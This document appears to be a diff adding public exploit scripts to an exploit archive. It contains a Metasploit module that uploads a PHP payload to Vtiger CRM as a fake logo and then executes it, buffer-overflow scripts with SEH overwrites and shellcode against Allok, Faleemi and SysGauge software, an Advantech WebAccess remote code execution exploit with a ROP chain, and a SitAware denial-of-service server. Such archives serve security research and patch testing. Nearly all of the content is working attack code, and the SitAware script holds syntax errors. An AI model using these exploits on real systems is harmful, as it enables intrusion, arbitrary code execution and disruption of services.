+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vhost' => "#{rhost}:#{rport}",
+      })
+
+      # Grabbing CSRF token from body
+      /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
+CSRF token") if csrf.nil?
+      vprint_good("CSRF Token for login: #{csrf}")
+
+      # Get Login now.
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login',
+        },
+        'vars_post' => {
+        '__vtrftk' => csrf,
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      },
+      })
+
+    unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
+Login request")
+    end
+
+    if res.code == 302 &&
+res.headers['Location'].include?("index.php?module=Users&parent=Settings&view=SystemSetup")
+      vprint_good("Authentication successful:
+#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      return res.get_cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed
+:[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+      return nil
+    end
+  end
+
+  def exploit
+    begin
+      cookie = login
+      pay_name = rand_text_alpha(rand(5..10)) + ".php"
+
+      # Make a payload raw. I added this bcz when i making this module.
+server have short_open_tag=ON
+      vprint_warning("Payload Generate according to
+short_open_tag=#{datastore['PHPSHORTTAG']}")
+      if datastore['PHPSHORTTAG'] == true
+        stager = '<? '
+        stager << payload.encode
+        stager << ' ?>'
+      else
+        stager = '<?php '
+        stager << payload.encode
+        stager << ' ?>'
+      end
+
+
+      # Again request for CSRF_token
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vhost' => "#{rhost}:#{rport}",
+        'cookie' => cookie
+      })
+
+      # Grabbing CSRF token from body
+      /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
+CSRF token") if csrf.nil?
+      vprint_good("CSRF Token for Form Upload: #{csrf}")
+
+      # Setting Company Form data
+      post_data = Rex::MIME::Message.new
+      post_data.add_part(csrf, content_type = nil, transfer_encoding = nil,
+content_disposition = "form-data; name=\"__vtrftk\"") # CSRF token
+      post_data.add_part('Vtiger', content_type = nil, transfer_encoding =
+nil, content_disposition = "form-data; name=\"module\"")
+      post_data.add_part('Settings', content_type = nil, transfer_encoding
+= nil, content_disposition = "form-data; name=\"parent\"")
+      post_data.add_part('CompanyDetailsSave', content_type = nil,
+transfer_encoding = nil, content_disposition = "form-data; name=\"action\"")
+      post_data.add_part(stager, content_type = "image/jpeg",
+transfer_encoding = nil, content_disposition = "form-data; name=\"logo\";
+filename=\"#{pay_name}\"") #payload Content-type bypass
+      post_data.add_part('vtiger', content_type = nil, transfer_encoding =
+nil, content_disposition = "form-data; name=\"organizationname\"")
+      post_data.add_part('95, 12th Main Road, 3rd Block, Rajajinagar',
+content_type = nil, transfer_encoding = nil, content_disposition =
+"form-data; name=\"address\"")
+      post_data.add_part('Bangalore', content_type = nil, transfer_encoding
+= nil, content_disposition = "form-data; name=\"city\"")
+      post_data.add_part('Karnataka', content_type = nil, transfer_encoding
+= nil, content_disposition = "form-data; name=\"state\"")
+      post_data.add_part('560010', content_type = nil, transfer_encoding =
+nil, content_disposition = "form-data; name=\"code\"")
+      post_data.add_part('India', content_type = nil, transfer_encoding =
+nil, content_disposition = "form-data; name=\"country\"")
+      post_data.add_part('+91 9243602352', content_type = nil,
+transfer_encoding = nil, content_disposition = "form-data; name=\"phonxe\"")
+      post_data.add_part('+91 9243602352', content_type = nil,
+transfer_encoding = nil, content_disposition = "form-data; name=\"fax\"")
+      post_data.add_part('www.touhidshaikh.com', content_type = nil,
+transfer_encoding = nil, content_disposition = "form-data;
+name=\"website\"")
+      post_data.add_part('1234-5678-9012', content_type = nil,
+transfer_encoding = nil, content_disposition = "form-data; name=\"vatid\"")
+      post_data.add_part(' ', content_type = nil, transfer_encoding = nil,
+content_disposition = "form-data; name=\"saveButton\"")
+      data = post_data.to_s
+
+      print_good("Payload ready for upload : [ #{pay_name} ]")
+
+      print_status("Uploading payload..")
+      # in Company Logo upload our payload.
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vhost' => "#{rhost}:#{rport}",
+        'cookie' => cookie,
+        'connection' => 'close',
+        'headers' => {
+          'Referer' => "http://
+#{rhost}:#{rport}/index.php?parent=Settings&module=Vtiger&view=CompanyDetails",
+          'Upgrade-Insecure-Requests' => '1',
+        },
+        'data' => data,
+        'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      })
+
+      unless res && res.code == 302
+        fail_with(Failure::None, "#{peer} - File wasn't uploaded,
+aborting!")
+      end
+
+      # Cleanup file.
+      register_files_for_cleanup(pay_name)
+
+      print_status("Executing Payload [
+#{rhost}:#{rport}/test/logo/#{pay_name} ]" )
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path, "test", "logo", pay_name)
+      })
+
+      # If we don't get a 200 when we request our malicious payload, we
+suspect
+      # we don't have a shell, either.
+      if res && res.code != 200
+        print_error("Unexpected response, probably the exploit failed")
+      end
+
+      disconnect
+    end
+  end
+end

exploits/windows/dos/44372.py

@@ -0,0 +1,24 @@
+#!/usr/bin/python
+############################################################################################
+# Exploit Title       : SysGauge v4.5.18 - Local Denial of Service                         #
+# Exploit Author      : Hashim Jawad                                                       #
+# Twitter             : @ihack4falafel                                                     # 
+# Author Website      : ihack4falafel[.]com                                                #
+# Vendor Homepage     : http://www.sysgauge.com/                                           #
+# Vulnerable Software : http://www.sysgauge.com/setups/sysgauge_setup_v4.5.18.exe          #
+# Note                : SysGauge Pro and Ultimate v4.5.18 are also vulnerable              #
+# Steps to Reproduce  : ~ Copy content of payload.txt                                      # 
+#                       ~ Select Manual proxy configuration under Options->Proxy           #
+#                       ~ Paste content in 'Proxy Server Host Name' field and click Save   #
+############################################################################################
+
+buffer = "A" * 3500
+
+try:
+    f=open("payload.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/44363.py

@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+#
+# Exploit Title         : Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH)
+# Date                  : 3/27/18
+# Exploit Author        : wetw0rk
+# Vulnerable Software   : Allok AVI DivX MPEG to DVD Converter
+# Vendor Homepage       : http://alloksoft.com/
+# Version               : 2.6.1217
+# Software Link         : http://alloksoft.com/allok_avimpeg2dvd.exe
+# Tested On             : Windows 10 , Windows 7 (x86-64)
+#
+# Greetz : Paul, Sally, Nekotaijutsu, mvrk, abatchy17
+#
+# Trigger the vulnerability by:
+#   Copy text file contents -> paste into "License Name" -> calc
+#
+
+shellcode = "\x90" * 20 # nop sled
+shellcode += (          # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d" -f c
+"\xd9\xe9\xd9\x74\x24\xf4\xbe\x4b\x88\x2c\x8f\x58\x31\xc9\xb1"
+"\x31\x83\xe8\xfc\x31\x70\x14\x03\x70\x5f\x6a\xd9\x73\xb7\xe8"
+"\x22\x8c\x47\x8d\xab\x69\x76\x8d\xc8\xfa\x28\x3d\x9a\xaf\xc4"
+"\xb6\xce\x5b\x5f\xba\xc6\x6c\xe8\x71\x31\x42\xe9\x2a\x01\xc5"
+"\x69\x31\x56\x25\x50\xfa\xab\x24\x95\xe7\x46\x74\x4e\x63\xf4"
+"\x69\xfb\x39\xc5\x02\xb7\xac\x4d\xf6\x0f\xce\x7c\xa9\x04\x89"
+"\x5e\x4b\xc9\xa1\xd6\x53\x0e\x8f\xa1\xe8\xe4\x7b\x30\x39\x35"
+"\x83\x9f\x04\xfa\x76\xe1\x41\x3c\x69\x94\xbb\x3f\x14\xaf\x7f"
+"\x42\xc2\x3a\x64\xe4\x81\x9d\x40\x15\x45\x7b\x02\x19\x22\x0f"
+"\x4c\x3d\xb5\xdc\xe6\x39\x3e\xe3\x28\xc8\x04\xc0\xec\x91\xdf"
+"\x69\xb4\x7f\xb1\x96\xa6\x20\x6e\x33\xac\xcc\x7b\x4e\xef\x9a"
+"\x7a\xdc\x95\xe8\x7d\xde\x95\x5c\x16\xef\x1e\x33\x61\xf0\xf4"
+"\x70\x9d\xba\x55\xd0\x36\x63\x0c\x61\x5b\x94\xfa\xa5\x62\x17"
+"\x0f\x55\x91\x07\x7a\x50\xdd\x8f\x96\x28\x4e\x7a\x99\x9f\x6f"
+"\xaf\xfa\x7e\xfc\x33\xd3\xe5\x84\xd6\x2b"
+)
+
+offset  = "A" * 780
+nSEH    = "\x90\x90\xeb\x06" # jmp +0x06
+SEH     = "\x30\x45\x01\x10" # pop edi, pop esi, ret [SkinMagic.dll]
+trigger = "D" * (50000 - len(# trigger the vuln (plenty of space!!!)
+    offset  +
+    nSEH    +
+    SEH     +
+    shellcode
+    )
+)
+
+payload = offset + nSEH + SEH + shellcode + trigger 
+fd = open("pasteME.txt", "w")
+fd.write(payload)
+fd.close()

exploits/windows/local/44364.py

@@ -0,0 +1,58 @@
+# SWAMI KARUPASAMI THUNAI
+
+###############################################################################
+# Exploit Title:        Alloksoft Video joiner (4.6.1217) - Buffer Overflow Vulnerability (Windows XP SP3)
+# Date:                 06-03-2018
+# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
+# Organization :        TwinTech Solutions
+# Vulnerable Software:  Allok Video joiner
+# Vendor Homepage:      http://www.alloksoft.com
+# Version:              4.6.1217
+# Software Link:        http://www.alloksoft.com/joiner.htm
+# Tested On:            Windows XP Service Pack 3 (Version 2002)
+#
+# Credit to Velayutham Selvaraj for discovering the Vulnerbility
+# Vulnerability Disclosure Date : 2018-03-06
+#
+# Manual steps to reproduce the vulnerability ... 
+#1.  Download and install the setup file
+#2.  Run this exploit code via python 2.7
+#3.  A file "exploit.txt" will be created
+#4.  Copy the contents of the file and paste in the License Name field 
+#    Name > exploit.txt
+#5.  Type some random character in License Code
+#6.  Click Register and voila !
+#7.  Boom calculator opens
+#
+##############################################################################
+import struct
+
+file = open("exploit.txt","wb")
+buflen = 4000
+junk = "A" * 780
+nseh = "\x90\x90\xeb\x10"
+seh  = struct.pack("<L",0x10019A09)
+nops = "\x90" * 20
+# The below shellcode will open calculator, but can be modified by need.
+shellcode = ""
+shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
+shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
+shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
+shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
+shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
+shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
+shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
+shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
+shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
+shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
+shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
+shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
+shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
+shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
+shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
+shellcode +="\xc4\xd9"
+exploit = junk + nseh + seh + nops + shellcode
+fillers = buflen - len(exploit)
+buf = exploit + "D" * fillers
+file.write(buf)
+file.close()

exploits/windows/local/44365.py

@@ -0,0 +1,58 @@
+# SWAMI KARUPASAMI THUNAI
+
+###############################################################################
+# Exploit Title:        Allok soft WMV to AVI MPEG DVD WMV Converter - Buffer Overflow Vulnerability (Windows XP SP3)
+# Date:                 06-03-2018
+# Exploit Author:       Mohan Ravichandran & Velayutham Selvaraj
+# Organization :        TwinTech Solutions (Talented Pentesters Hut)
+# Vulnerable Software:  Allok WMV to AVI MPEG DVD WMV Converter
+# Vendor Homepage:      http://www.alloksoft.com
+# Version:              4.6.1217
+# Software Link:        http://www.alloksoft.com/wmv.htm
+# Tested On:            Windows XP Service Pack 3 (Version 2002)
+#
+# Credit to Velayutham Selvaraj for discovering the Vulnerbility
+# Vulnerability Disclosure Date : 2018-03-06
+#
+# Manual steps to reproduce the vulnerability ... 
+#1.  Download and install the setup file
+#2.  Run this exploit code via python 2.7
+#3.  A file "exploit.txt" will be created
+#4.  Copy the contents of the file and paste in the License Name field 
+#    Name > exploit.txt
+#5.  Type some random character in License Code
+#6.  Click Register and voila !
+#7.  Boom calculator opens
+#
+##############################################################################
+import struct
+
+file = open("exploit.txt","wb")
+buflen = 4000
+junk = "A" * 780
+nseh = "\x90\x90\xeb\x10"
+seh  = struct.pack("<L",0x10019A09)
+nops = "\x90" * 20
+# The below shellcode will open calculator, but can be modified by need.
+shellcode = ""
+shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
+shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
+shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
+shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
+shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
+shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
+shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
+shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
+shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
+shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
+shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
+shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
+shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
+shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
+shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
+shellcode +="\xc4\xd9"
+exploit = junk + nseh + seh + nops + shellcode
+fillers = buflen - len(exploit)
+buf = exploit + "D" * fillers
+file.write(buf)
+file.close()

exploits/windows/local/44382.py

@@ -0,0 +1,55 @@
+'''
+Faleemi Desktop Software for Windows- (DDNS/IP) Local Buffer Overflow 
+
+Vuln Description:
+Faleemi Desktop Software for Windows and its Beta version (Faleemi Plus Desktop Software for Windows(Beta)) are vulnerable to Buffer Overflow exploit. When overly input is given to DDNS/IP parameter, it overflows the buffer corrupting EIP which can utilized cleverly for local arbitrary code execution. If this software is running as admin and if a low priv user has access to this application to enter new device, he can exploit the Buffer Overflow in the DDNS/IP parameter to obtain Admin privs. An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
+
+Vulnerable Application Info:
+1. Faleemi Desktop Software for Windows
+URL: http://support.faleemi.com/fsc776/Faleemi_v1.8.exe
+
+2. Faleemi Desktop Software for Windows (Beta)
+URL: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
+
+After hitting enter new device, click Enter device manually
+'''
+
+#!/usr/bin/python 
+import socket
+# Create an array of buffers, from 1 to 5900, with increments of 200. 
+calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
+"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
+"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
+"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
+"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
+"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
+"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
+"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
+"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
+"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
+"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
+"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
+"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
+"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
+"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
+"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
+"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
+"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
+"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
+"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
+"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
+"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
+"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
+"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
+"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
+"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
+"\x55\x43\x30\x41\x41")
+
+buffer = "A" * 132 + "\x4B\x43\x71\x6B" + calc
+
+f = open('shellcode.txt', "wb")
+f.write(buffer)
+f.close()

exploits/windows/remote/44376.py

@@ -0,0 +1,133 @@
+#!/usr/bin/python2.7
+  
+# Exploit Title: Advantech WebAccess < 8.1 webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow RCE
+# Date: 03-29-2018
+# Exploit Author: Chris Lyne (@lynerc)
+# Vendor Homepage: www.advantech.com
+# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe
+# Version: Advantech WebAccess 8.0-2015.08.16
+# Tested on: Windows Server 2008 R2 Enterprise 64-bit
+# CVE : CVE-2016-0856
+# See Also: https://www.zerodayinitiative.com/advisories/ZDI-16-093/
+
+import sys, struct
+from impacket import uuid
+from impacket.dcerpc.v5 import transport
+
+def call(dce, opcode, stubdata):
+  dce.call(opcode, stubdata)
+  res = -1
+  try:
+    res = dce.recv()
+  except Exception, e:
+    print "Exception encountered..." + str(e)
+    sys.exit(1)
+  return res
+
+if len(sys.argv) != 2:
+  print "Provide only host arg"
+  sys.exit(1)
+
+port = 4592
+interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
+version = "1.0" 
+
+host = sys.argv[1]
+
+string_binding = "ncacn_ip_tcp:%s" % host
+trans = transport.DCERPCTransportFactory(string_binding)
+trans.set_dport(port)
+
+dce = trans.get_dce_rpc()
+dce.connect()
+
+print "Binding..."
+iid = uuid.uuidtup_to_bin((interface, version))
+dce.bind(iid)
+
+print "...1"
+stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
+call(dce, 2, stubdata)
+
+print "...2"
+stubdata = struct.pack("<I", 0x02)
+res = call(dce, 4, stubdata)
+if res == -1:
+  print "Something went wrong"
+  sys.exit(1)
+res = struct.unpack("III", res)
+
+if (len(res) < 3):
+  print "Received unexpected length value"
+  sys.exit(1)
+
+print "...3"
+
+# MessageBoxA() Shellcode
+# Credit: https://www.exploit-db.com/exploits/40245/
+shellcode = ("\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0")
+
+def create_rop_chain():
+    rop_gadgets = [
+      0x0704ac03,  # XOR EAX,EAX # RETN    ** [BwPAlarm.dll]             eax = 0
+      0x0706568c,  # XOR EDX,EDX # RETN    ** [BwPAlarm.dll]             edx = 0
+
+      0x0702455b,  # ADD EAX,40 # RETN    ** [BwPAlarm.dll] **           eax = 0x40
+      0x0702823d,  # PUSH EAX # ADD BYTE PTR DS:[ESI],7 # MOV DWORD PTR DS:[7070768],0 # POP ECX # RETN
+      # ecx = 0x40
+    ]
+    for i in range(0, 63):
+        rop_gadgets.append(0x0702455b) # ADD EAX,40 # RETN    ** [BwPAlarm.dll] **
+    # eax = 0x1000
+    
+    rop_gadgets += [
+      0x0702143d,  # ADD EDX,EAX # ADD AL,0 # AND EAX,0FF # RETN 0x04    ** [BwPAlarm.dll]
+      # edx = eax
+      # edx = 0x1000
+
+      0x07065b7b,  # POP EDI # RETN [BwPAlarm.dll]
+      0x41414141, 
+      0x07059581,  # RETN (ROP NOP) [BwPAlarm.dll]
+      # edi = RETN
+
+      0x0705ddfd,  # POP EAX # RETN [BwPAlarm.dll]
+      0x0201e104,  # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
+      0x070630eb,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwPAlarm.dll]
+      0x070488f7,  # PUSH EAX # MOV EAX,DWORD PTR DS:[EDX*4+7068548] # AND EAX,ESI # POP ESI # POP EBX # RETN 
+      # esi -> PTR to VirtualAlloc
+      0xFFFFFFFF # ebx = -1
+    ]
+    for i in range(0, len(shellcode)+1):
+      rop_gadgets.append(0x0703e116) # INC EBX # MOV AX,10 # RETN    ** [BwPAlarm.dll]
+    # ebx = size of shellcode
+
+    rop_gadgets += [
+      0x070441d1,  # POP EBP # RETN [BwPAlarm.dll]
+      0x0703fe39,  # POINTER INC ECX # PUSH ESP # RETN    ** [BwPAlarm.dll] **
+      # ebp -> Return to ESP
+      
+      0x0705ddfd,  # POP EAX # RETN [BwPAlarm.dll] ------ Modified by me 
+      0x90909090,  # nop
+      # eax = 0x90909090
+
+      0x07010f5c  # PUSHAD # RETN [BwPAlarm.dll] 
+    ]
+
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+
+# construct buffer
+buf = "A"*379
+buf += "\x33\xb7\x01\x07" # 0701b733 RETN
+buf += create_rop_chain()
+buf += shellcode
+
+# ioctl 0x278E
+stubdata = struct.pack("<IIII", res[2], 0x278E, len(buf), len(buf))
+
+fmt = "<" + str(len(buf)) + "s"
+stubdata += struct.pack(fmt, buf)
+
+print "\nDid it work?"
+call(dce, 1, stubdata)
+
+dce.disconnect()

exploits/xml/dos/44375.py

@@ -0,0 +1,63 @@
+# Exploit Title: SitAware NVG Denial of Service 
+# Date: 03/31/2018
+# Exploit Author: 2u53
+# Vendor Homepage: https://systematic.com/defence/products/c2/sitaware/
+# Version: 6.4 SP2
+# Tested on: Windows Server 2012 R2
+# CVE: CVE-2018-9115
+
+# Remarks: PoC needs bottlypy:
+# https://bottlepy.org/docs/dev/
+# https://raw.githubusercontent.com/bootlepy/bottle/master/bottle.py
+
+# Systematic's SitAware does not validate input from other sources suffenciently. Incoming information utilizing 
+# the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means
+# that the Situational Picture is no more updated. Unfortunately the user can not notice until 
+# he tries to work with the situational layer. 
+
+
+#!/bin/python
+
+from bottle import post, run, request, response
+
+LHOST = 127.0.0.1 # Local IP which the NVG server should use
+LPORT = 8080 # Local Port on which the NVG server should listen
+
+GET_CAPABILITIES = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
+<ns3:GetCapabilitiesResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
+<ns4:nvg_capabilities version="1.5">
+</ns4:nvg_capabilities>
+</ns3:GetCapabilitiesResponse>
+</soap:Body>
+</soap:Envelope>'''
+
+EVIL_NVG = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
+<ns3:GetNvgResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
+<ns4:nvg version="1.5" classification="NATO UNCLASSIFIED">
+<ns4:multipoint points="-0.01,0.01 0.02,-0.02 0.01,0.01" symbol="2525b:GFTPZ---------X"
+label="EVILOBJ"/>
+</ns4:nvg>
+</ns3:GetNvgResponse>
+</soap:Body>
+</soap:Envelope>'''
+
+@post('/nvg')
+def soap():
+    action = dict(request.headers.items()).get('Soapaction')
+    action = action.replace('"', '')
+    print('Incoming connection')
+
+    response.content_type = 'text/xml;charset=utf-8'
+
+    if action.endswith('nvg/GetCapabilities'):
+        print('Sending capabilities to victim'...)
+        return GET_CAPABILITIES
+        print('Done! Waiting for NVG request...')
+    elif action.endswith('nvg/GetNvg'):
+        print('Sending evil NVG')
+        return EVIL_NVG
+        print('Done!')
+    else
+        print('Invalid request received')
+
+run(host=LHOST, port=LPORT)

files_exploits.csv

@@ -5915,6 +5915,8 @@ id,file,description,date,author,type,platform,port
 44332,exploits/linux/dos/44332.py,"Dell EMC NetWorker - Denial of Service",2018-03-23,"Marek Cybul",dos,linux,
 44333,exploits/windows/dos/44333.py,"WM Recorder 16.8.1 - Denial of Service",2018-03-23,bzyo,dos,windows,
 44338,exploits/windows/dos/44338.py,"Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service",2018-03-23,"Hashim Jawad",dos,windows,
+44372,exploits/windows/dos/44372.py,"SysGauge 4.5.18 - Local Denial of Service",2018-03-30,"Hashim Jawad",dos,windows,
